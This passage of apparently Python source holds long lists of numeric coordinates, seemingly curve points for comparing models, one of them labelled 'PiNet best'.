0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.19642857142857142, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.16071428571428573, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.14285714285714285, 0.125, 0.125, 0.125, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.10714285714285714, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.08928571428571429, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.05357142857142857, 0.05357142857142857, 0.05357142857142857, 0.05357142857142857, 0.05357142857142857, 0.05357142857142857, 0.05357142857142857, 0.03571428571428571, 0.03571428571428571, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.017857142857142856, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] , [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.984375, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.96875, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.953125, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.9375, 0.921875, 0.921875, 0.921875, 0.921875, 0.921875, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.90625, 0.890625, 0.875, 0.859375, 0.859375, 0.859375, 0.859375, 0.84375, 0.828125, 0.828125, 0.828125, 0.828125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.796875, 0.796875, 0.78125, 0.78125, 0.765625, 0.765625, 0.765625, 0.765625, 0.765625, 0.75, 0.75, 0.75, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.734375, 0.71875, 0.71875, 0.71875, 0.71875, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.703125, 0.6875, 0.671875, 0.671875, 0.671875, 0.671875, 0.671875, 0.671875, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.65625, 0.640625, 0.640625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.609375, 0.609375, 0.59375, 0.59375, 0.59375, 0.578125, 0.578125, 0.546875, 0.546875, 0.53125, 0.53125, 0.515625, 0.484375, 0.484375, 0.484375, 0.484375, 0.46875, 0.453125, 0.453125, 0.453125, 0.453125, 0.453125, 0.453125, 0.453125, 0.453125, 0.453125, 0.4375, 0.4375, 0.4375, 0.421875, 0.40625, 0.40625, 0.40625, 0.40625, 0.40625, 0.40625, 0.40625, 0.390625, 0.390625, 0.390625, 0.390625, 0.390625, 0.390625, 0.390625, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.34375, 0.34375, 0.34375, 0.34375, 0.34375, 0.34375, 0.34375, 0.328125, 0.328125, 0.3125, 0.3125, 0.296875, 0.296875, 0.296875, 0.296875, 0.296875, 0.296875, 0.296875, 0.296875, 0.265625, 0.265625, 0.25, 0.25, 0.25, 0.25, 0.25, 0.234375, 0.21875, 0.203125, 0.203125, 0.203125, 0.203125, 0.203125, 0.203125, 0.203125, 0.1875, 0.1875, 0.1875, 0.171875, 0.15625, 0.15625, 0.140625, 0.109375, 0.109375, 0.09375, 0.09375, 0.09375, 0.09375, 0.078125, 0.078125, 0.078125, 0.078125, 0.078125, 0.078125, 0.078125, 0.078125, 0.078125, 0.0625, 0.0625, 0.0625, 0.0625, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.046875, 0.03125, 0.03125, 0.03125, 0.03125, 0.03125, 0.015625, 0.015625, 0.015625, 0.015625, 0.015625, 0.015625, 0.015625, 0.015625, 0.015625, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] # PiNet best x4, y4 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.016129032258064516, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.03225806451612903, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.04838709677419355, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.06451612903225806, 0.08064516129032258, 0.08064516129032258, 0.08064516129032258, 0.08064516129032258, 0.08064516129032258, 0.08064516129032258, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.0967741935483871, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.11290322580645161, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.12903225806451613, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.14516129032258066, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.16129032258064516, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1774193548387097, 0.1935483870967742, 0.1935483870967742, 0.1935483870967742, 0.1935483870967742, 0.1935483870967742, 0.1935483870967742, 0.1935483870967742, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.20967741935483872, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.22580645161290322, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.24193548387096775, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.25806451612903225, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.27419354838709675, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.2903225806451613, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3225806451612903, 0.3387096774193548, 0.3387096774193548, 0.3387096774193548, 0.3387096774193548, 0.3387096774193548, 0.3387096774193548, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3548387096774194, 0.3709677419354839, 0.3709677419354839, 0.3709677419354839, 0.3709677419354839, 0.3709677419354839, 0.3709677419354839, 0.3709677419354839, 0.3709677419354839, 0.3870967741935484, 0.3870967741935484, 0.3870967741935484, 0.3870967741935484, 0.3870967741935484, 0.3870967741935484, 0.3870967741935484, 0.3870967741935484, 0.4032258064516129, 0.4032258064516129, 0.41935483870967744, 0.41935483870967744, 0.41935483870967744, 0.41935483870967744, 0.41935483870967744, 0.43548387096774194, 0.43548387096774194, 0.43548387096774194, 0.45161290322580644, 0.45161290322580644, 0.45161290322580644, 0.45161290322580644, 0.45161290322580644, 0.46774193548387094, 